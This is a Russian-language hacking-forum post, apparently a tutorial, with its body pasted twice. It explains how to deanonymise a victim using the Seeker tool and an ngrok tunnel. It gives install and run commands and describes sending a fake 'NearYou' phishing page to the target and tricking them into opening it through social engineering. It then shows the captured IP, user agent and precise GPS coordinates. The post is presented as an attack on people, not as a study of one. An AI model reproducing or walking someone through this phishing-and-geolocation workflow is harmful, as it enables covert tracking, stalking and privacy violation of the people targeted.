DiNo
Опытный user
- Регистрация
- 10 Янв 2019
- Сообщения
- 709
- Реакции
- 56
Для деанонимизации достаточно использовать утилиту Seeker (местоположение, IP, OS, количество ядер процессора, CPU, GPU. браузер). Что это такое и с чем ее едят? Об этом ниже.
Как это работает?
Запускаем фишинговый сайт, скидываем его жертве, с помощью СИ заставляем перейти. Он переходит, мы получаем IP и т.д. Если даёт доступ к геолокации, то получаем точное месторасположение.
Нам нужно
Сам seeker + ngrok. Атаку произведем с Kali Linux.
Установка Seeker:
sudo apt update
sudo apt install python3 python3-pip php ssh git
pip3 install requests
git clone https://github.com/thewhiteh4t/seeker
cd seeker/
python3 ./seeker.py -h
Установка Ngrok:
wget `curl -s https://ngrok.com/download | grep -o -E 'https://bin.equinox.io/c/[A-Za-z0-9]{4,}/ngrok-stable-linux-amd64.zip'`
unzip ngrok-stable-linux-amd64.zip
chmod +x ./ngrok
./ngrok -h
Seeker
Запускаем seeker:
python3 ./seeker.py -t manual
Если при попытке запуска встроенного PHP сервера у вас возникли проблемы, то посмотрите содержимое файла ./logs/php.log.
На выбор присутствует два готовых шаблона:
[1] NearYou
[2] Google Drive
Выбираю первый.
Затем выводится информация:
[+] Starting PHP Server......[ Success ]
[+] Waiting for User Interaction...
В ней говорят, что PHP сервер запущен и ожидается взаимодействие с пользователем. Идем дальше.
Для создания тоннеля из интернета до нашего локального сервера, в другом окне запускаем ngrok:
./ngrok http 8080
Получаем сгенерированную ссылку https://1fa595b3.ngrok.io.
Кидаем ее жертве. Если пользователь открыл ссылку на настольном компьютере, он увидит следующее:
Страница выглядит весьма профессионально. Надписи говорят о том, что этот сервис позволяет найти людей рядом с вами и завести новых друзей. Допустим, пользователь нажал кнопку «Continue»:
Возникает запрос на доступ к местоположению.
В окне seeker мы видим следующее:
Мы получили IP и User Agent пользователя, но данные о местоположении не получены -- у компьютера нет GPS модуля:
[-] Location information is unavailable
Откроем теперь фишинговую ссылку на мобильном телефоне.
Запрос данных о местоположении:
В этот раз получены данные локации:
[+] Location Information :
[+] Latitude : 12.458610728197513 deg
[+] Longitude : 99.97342079401619 deg
[+] Accuracy : 3.4233226776123047 m
[+] Altitude : 65.55902099609375
[+] Direction : Not Available
[+] Speed : 0.23704902827739716 m/s
Ссылка на гугл карты: https://www.google.com/maps/place/12.458610728197513+99.97342079401619
Также сказано, что данные сохранены в файл по пути ./seeker/db/results.csv.
Как это работает?
Запускаем фишинговый сайт, скидываем его жертве, с помощью СИ заставляем перейти. Он переходит, мы получаем IP и т.д. Если даёт доступ к геолокации, то получаем точное месторасположение.
Нам нужно
Сам seeker + ngrok. Атаку произведем с Kali Linux.
Установка Seeker:
sudo apt update
sudo apt install python3 python3-pip php ssh git
pip3 install requests
git clone https://github.com/thewhiteh4t/seeker
cd seeker/
python3 ./seeker.py -h
Установка Ngrok:
wget `curl -s https://ngrok.com/download | grep -o -E 'https://bin.equinox.io/c/[A-Za-z0-9]{4,}/ngrok-stable-linux-amd64.zip'`
unzip ngrok-stable-linux-amd64.zip
chmod +x ./ngrok
./ngrok -h
Seeker
Запускаем seeker:
python3 ./seeker.py -t manual
Если при попытке запуска встроенного PHP сервера у вас возникли проблемы, то посмотрите содержимое файла ./logs/php.log.
На выбор присутствует два готовых шаблона:
[1] NearYou
[2] Google Drive
Выбираю первый.
Затем выводится информация:
[+] Starting PHP Server......[ Success ]
[+] Waiting for User Interaction...
В ней говорят, что PHP сервер запущен и ожидается взаимодействие с пользователем. Идем дальше.
Для создания тоннеля из интернета до нашего локального сервера, в другом окне запускаем ngrok:
./ngrok http 8080
Получаем сгенерированную ссылку https://1fa595b3.ngrok.io.
Кидаем ее жертве. Если пользователь открыл ссылку на настольном компьютере, он увидит следующее:
Страница выглядит весьма профессионально. Надписи говорят о том, что этот сервис позволяет найти людей рядом с вами и завести новых друзей. Допустим, пользователь нажал кнопку «Continue»:
Возникает запрос на доступ к местоположению.
В окне seeker мы видим следующее:
Мы получили IP и User Agent пользователя, но данные о местоположении не получены -- у компьютера нет GPS модуля:
[-] Location information is unavailable
Откроем теперь фишинговую ссылку на мобильном телефоне.
Запрос данных о местоположении:
В этот раз получены данные локации:
[+] Location Information :
[+] Latitude : 12.458610728197513 deg
[+] Longitude : 99.97342079401619 deg
[+] Accuracy : 3.4233226776123047 m
[+] Altitude : 65.55902099609375
[+] Direction : Not Available
[+] Speed : 0.23704902827739716 m/s
Ссылка на гугл карты: https://www.google.com/maps/place/12.458610728197513+99.97342079401619
Также сказано, что данные сохранены в файл по пути ./seeker/db/results.csv.
